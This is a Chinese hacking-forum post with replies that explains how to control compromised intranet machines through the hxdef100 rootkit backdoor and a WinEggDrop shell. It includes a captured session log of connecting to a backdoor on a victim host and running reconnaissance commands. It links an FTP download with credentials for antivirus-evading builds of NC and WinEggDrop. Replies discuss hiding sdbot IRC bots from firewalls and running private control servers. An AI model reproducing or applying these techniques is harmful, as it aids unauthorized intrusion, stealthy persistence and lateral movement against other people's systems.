文章作者：blackbear
信息来源：邪恶八进制安全小组

谢谢所有在这里帖文的朋友给大家一个学习的空间！一直在这里白看，今天有了点时间，就和大家分享下经验！

一直以来都习惯用wineggdrop shell来对主机进行检测，强大的

功能，方面的命令行操作基本可以完成对一个主机的控制和操作。

但是wineggdrop shell对限制端口或者内网主机，只是映射很少

端口到外网IP的主机就没办法使用，PortLess可以实现但是功能

就少很多。其实完全可以利用hxdef100来实现在内网肉鸡上使用

wineggdrop shell的强大功能。(这里顺便说明下，如果在肉鸡上

已经安装了hxdef100和wineggdrop shell，那么wineggdrop shell

的Fport和Findpassword功能有点问题，你可以用其他单独程序来

得到Fport和Findpassword。或者先安装wineggdrop shell，所有

操作完成后再安装hxdef100，如果是内网，限制端口的主机，你

可以先控制内网其中一个主机，映射端口出来终端登录再实现对

其他机器的控制，直接telnet内网IP，这里就不细说了)

例，内网IP 127.0.0.1
   外网IP 211.*.*.*(开放端口80，1433)
已经安装hxdef100和wineggdrop shell。怎么安装的?赫赫，你注入

也好，放马也行，溢出更好。

先
E:\hk>bdcli100.exe 211.*.*.* 80 ****  (连接hxdef100)
connecting server ...
receiving banner ...
opening backdoor ..
backdoor found
checking backdoor ........
backdoor ready
authorization sent, waiting for reply

Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


C:\WINNT\system32>telnet 127.0.0.1 ****  (telnet wineggdrop shell)

****
          Welcome To WinEggDropShell Eternity Version

[Melody
]#sysinfo
Cpu: Intel(R) Xeon(TM) CPU 2.80GHz
Ram: 1535MB Total, 1234MB Free
Os:Microsoft Windows 2000 Server Service Pack 4 (Build 2195)
Uptime: 2 Day 2 Hour 12 Minute
System Directory:C:\WINNT\system32
Number of Processors:4
The Default Language: Chinese (TaiWan)
Current Display Mode: 1280 x 1024(16Bit)(60Hz)
Disk Information:
Drive A: (REMOVABLE)
Drive C: (FIXED) Total Space:  24999M-->24.4G Free Space:  21425M-->20.9G
Drive D: (FIXED) Total Space:  9711M-->9.5G Free Space:  6783M-->6.6G
Drive E: (FIXED) Total Space: 105213M-->102.7G Free Space: 105140M-->102.7G
Drive F: (CDROM)

[Melody
]#listip
Local Host Name: ****
Local IP Adress(0): 10.10.9.*
Local IP Adress(1): 10.10.10.*
List IP Completed

[Melody
]#exit

C:\WINNT\system32>exit

E:\hk>

这样你就很方便利用wineggdrop shell对这个机器进行控制，而

不用下载很多单独程序进行一个一个的操作和检测。

开终端映射端口登录，进入内网机器你就会发现肉鸡多的让你安

的手酸，整个段整个服务公司主机都可能进入。赫赫！


附我修改的防杀NC和wineggdrop shell，原版下载

ftp://210.64.127.58:21211
test:test
Eternity.rar(2004－5－4)

同时说明除了对原程序作了防杀处理外没有进行任何其他修改。

wineggdrop shell也主要是对那个exe进行处理，dll文件只是简单压缩。

在McAfee 8.0i 版和
http://www.kaspersky.com/remoteviruschk.html
通过，不被查杀。


本文及修改的后门没有任何技术含量，只是一种思路，谢绝转载，谢谢！

同时发幻影

死雄```不公布制作，来公布这个``日死哦，不过内网的机器偶还是喜欢用sdbot来搞，嘿嘿
不过实在搞不懂sdbot这个玩意，在本机上百试百灵，可一telnet上了肉鸡安装就不一定会上线，以前在isgrey也讨论过这个问题，估计是irc马房的问题吧
思路不错，哈哈，给点掌声```啪，啪，啪，啪

编辑了一下 总算把主题题目缩短了-_-||| ：）

引用:

下面是引用superpig于2005-01-08 22:03发表的:
死雄```不公布制作，来公布这个``日死哦，不过内网的机器偶还是喜欢用sdbot来搞，嘿嘿
不过实在搞不懂sdbot这个玩意，在本机上百试百灵，可一telnet上了肉鸡安装就不一定会上线，以前在isgrey也讨论过这个问题，估计是irc马房的问题吧
思路不错，哈哈，给点掌声```啪，啪，啪，啪

tdongsdbot v1.03测试版(04.01.02)这个没有一点问题，
暂时我还没发现不能上线的肉鸡，特别是服务器肉鸡。
如果同时安装了hxdef100隐藏掉irc木马进程，有些防火墙
好像都不知道拦截。
irc服务器自己做，很方便用域名来控制。

上面那个压缩包里修改的程序因为附带了原版NC，可能
有的杀毒软件会报警，如果有要使用这个修改程序的朋友，
请看清楚是修改的程序还是原版程序被杀。